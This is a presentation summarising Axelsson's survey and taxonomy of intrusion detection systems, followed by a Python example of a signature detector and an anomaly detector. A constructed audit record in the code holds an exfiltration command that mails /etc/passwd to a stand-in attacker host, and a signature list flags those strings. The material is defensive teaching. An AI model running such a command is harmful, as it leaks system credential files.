Intrusion Detection Systems: A Survey and Taxonomy
A presentation by Emily Fetchko

About the paper
• By Stefan Axelsson of Chalmers University of Technology, Sweden
• From 2000
• Cited by 92 (Google Scholar)
• Featured on InfoSysSec
• Used in Network Security (691N)
• Followup to 1999 IBM paper “Towards a Taxonomy of Intrusion Detection Systems”

Outline
• New and Significant
• What is a taxonomy?
• Introduction to IDS
• Introduction to classification
• Taxonomy by Intrusion Detection Principle
• Example systems
• Taxonomy by System Characteristics
• Trends in Research and Conclusion

New and Significant
• First taxonomy paper
• Predicts research areas for Intrusion Detection
• Followup to 93-page survey report of research and IBM paper

What is a taxonomy?
• “either a hierarchical classification of things, or the principles underlying the classification” (Wikipedia)
• Serves three purposes
  – Description
  – Prediction
  – Explanation

Intrusion Detection Systems
• Compare them to burglar alarms
• Alarm/siren component
  – Something that alerts
• Security officer/response team component
  – Something to respond/correct
• Different from perimeter defense systems (such as a firewall)

Types of intrusions
• Masquerader
  – Steals identity of user
• Legitimate users who abuse the system
• Exploits
  – Trojan horse, backdoor, etc.
• And more

Two major types of detection
• Anomaly detection
  – “abnormal behavior”
  – May not be undesirable behavior
  – High false positive rate
• Signature detection
  – Close to previously-defined bad behavior
  – Has to be constantly updated
  – Slow to catch new malicious behavior

Approaches to classification
• Type of intrusion detected
• Type of data gathered
• Rules to detect intrusion

Taxonomy by Intrusion Detection Principles
• “self-learning”
  – Trains on “normal” behavior
• “programmed”
  – User must know difference between normal & abnormal
• “signature inspired”
  – Combination of anomaly and signature methods

Anomaly detection
• Time series vs. non-time series
• Rule modeling
  – Create rules describing “normal behavior”
  – Raise alarm if activity does not match rules
• Descriptive statistics
  – Compute distance vector between current system statistics and “normal” stats
• ANN – Artificial Neural Network
  – Black box modeling approach

Anomaly detection, continued
• Descriptive Statistics
  – Collect statistics about parameters such as #logins, #connections, etc.
  – Simple statistics – abstract
  – Rule-based
  – Threshold
• Default Deny
  – Define safe states
  – All other states are “deny” states

Signature Detection
• State-modeling
  – If the system is in this state (or followed a series of states) then an intrusion has occurred
  – Petri-net – states form a Petri net, a type of directed bipartite graph (place vs. transition nodes)

Signature Detection, continued
• Expert system
  – Reasoning based on rules
  – Forward-chaining most popular
• String-matching
  – Look for text transmitted
• Simple rule-based
  – Less advanced but faster than expert system

Signature Inspired Detection
• Only one system in the taxonomy (Signature Inspired and Self Learning)
• Automatic feature selection
  – Automatically determines which features are interesting
  – Isolate, use them to decide if intrusion or not

Classification by Type of Intrusion
• Well-known intrusions
  – Correspond to signature detection systems
• Generalized intrusions
  – Like a well-known intrusion, but with some parameters left blank
  – Correspond to signature-inspired detectors
• Unknown intrusions
  – Correspond to anomaly detectors

Effectiveness of Detection
• Two categories marked as least effective
• Anomaly – Self Learning – Non-time series
  – Weak in collecting statistics on normal behavior
  – Will create many false positives
• Anomaly – Programmed – Descriptive Statistics
  – If attacker knows stats used, can avoid them
  – Leads to false negatives

Taxonomy by System Characteristics
• Define system beyond the detection principle
• Time of detection
  – Real time or non-real time
• Granularity of data processing
  – Continuous or batch
• Source of audit data
  – Network or host

System Characteristics, continued
• Response to detected intrusions
  – Active or passive
  – Modify attacked or attacking system
• Locus of data processing
  – Centralized or distributed
• Locus of data collection
• Security (ability to defend against direct attack)
• Degree of interoperability
  – Work with other systems
  – Accept other forms of data

Example Systems
• Haystack, 1988
  – Air Force
  – Anomaly detection based on per-user profile and user-group profile
  – Signature-based detection
• MIDAS, 1988
  – National Computer Security Centre and Computer Science Laboratory, SRI International
  – Heuristic intrusion detection
  – Expert system with two-tiered rule base

Example Systems, continued
• IDES – Intrusion Detection Expert System, 1988-1992
  – Multiple authors, long-term effort
  – Real-time expert system with statistics
  – Compare current profile with known profile
  – Distinction between “on” and “off” days
  – NIDES = next generation IDES
• NSM – Network Security Monitor
  – Monitors broadcast traffic
  – Layered approach – connection & lower layers
  – Profile by protocol (telnet, etc.)

Example Systems, continued
• DIDS – Distributed IDS, 1992
  – Incorporates Haystack and NSM
  – Three components: Host monitor, LAN monitor, DIDS director
  – DIDS director contains expert system
• Bro, 1998
  – Network-based (with traffic analysis)
  – Custom scripting language
  – Prewritten policy scripts
  – Signature matching
  – Action after detection
  – Snort compatibility

System Characteristics, continued

Trends in Research
• Active response
  – Legal ramifications, however
• Distributed detection
  – Corresponds with distributed computing in general
• Increased security
• Increased interoperability

Opportunities for Further Research
• Taxonomies by other classifications
• Signature – self-learning detectors
• Two-tiered detectors
• False positive rates for anomaly detectors
• Active response detectors
• Distributed detectors
• High security detectors

Bibliography
• Stefan Axelsson. “Intrusion Detection Systems: A Survey and Taxonomy”. Chalmers University of Technology, Sweden, 2000.
• Debar, Dacier and Wespi. “Towards a taxonomy of intrusion-detection systems”. Computer Networks, pp. 805-822, 1999.
• Bro Intrusion Detection System, www.broids.org
• Google Scholar, http://scholar.google.com
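As an added worked example (not from the slides or from Axelsson's paper), the two detection principles from the "Two major types of detection" and "Anomaly detection, continued" slides side by side on constructed audit records: a programmed signature detector that string-matches known-bad command text, and a self-learning anomaly detector that trains a per-user profile of #logins and #connections and alarms when the distance vector from the "normal" stats exceeds a threshold. The user name, records, signatures and threshold are all constructed for illustration.

```python
import math

# Constructed training data: (logins, connections) for a user's normal days.
TRAINING = {"alice": [(3, 40), (4, 38), (2, 45), (3, 42), (4, 41), (3, 39)]}

# Constructed audit records: (user, logins, connections, command text).
AUDIT = [
    ("alice", 3, 41, "ls -l /home/alice"),                   # normal day
    ("alice", 3, 40, "cat /etc/passwd | mail x@evil.test"),  # known-bad text, stats kept normal
    ("alice", 9, 400, "scp big.tar staging"),                # novel: stats far from profile
    ("alice", 3, 95, "rsync -a project/ mirror/"),           # benign but unusual: false positive
]

# "Programmed" signature detector: strings the operator already knows are bad (constructed).
SIGNATURES = ["/etc/passwd", "| mail"]

def train_profile(samples):
    """Self-learning step: mean and standard deviation of each parameter."""
    n = len(samples)
    profile = []
    for i in range(2):
        vals = [s[i] for s in samples]
        mean = sum(vals) / n
        sd = math.sqrt(sum((v - mean) ** 2 for v in vals) / n)
        profile.append((mean, sd if sd > 0 else 1.0))  # avoid divide-by-zero on constant data
    return profile

def anomaly_distance(profile, logins, connections):
    """Length of the z-score distance vector between current stats and the profile."""
    z = [(x - mean) / sd for (mean, sd), x in zip(profile, (logins, connections))]
    return math.sqrt(sum(c * c for c in z))

def signature_match(command):
    """String-matching signature detection over the transmitted text."""
    return [sig for sig in SIGNATURES if sig in command]

def detect(records, threshold=3.0):
    """Run both detectors; 'anomaly' is True when the distance exceeds the threshold."""
    profiles = {user: train_profile(s) for user, s in TRAINING.items()}
    results = []
    for user, logins, connections, command in records:
        distance = anomaly_distance(profiles[user], logins, connections)
        results.append({
            "command": command,
            "signature": bool(signature_match(command)),
            "anomaly": distance > threshold,
            "distance": round(distance, 2),
        })
    return results
```

Record 2 keeps its statistics inside the profile so only the signature catches it, which is the "If attacker knows stats used, can avoid them" case; record 4 is ordinary work that trips the anomaly detector, the false positive the "High false positive rate" bullet warns about.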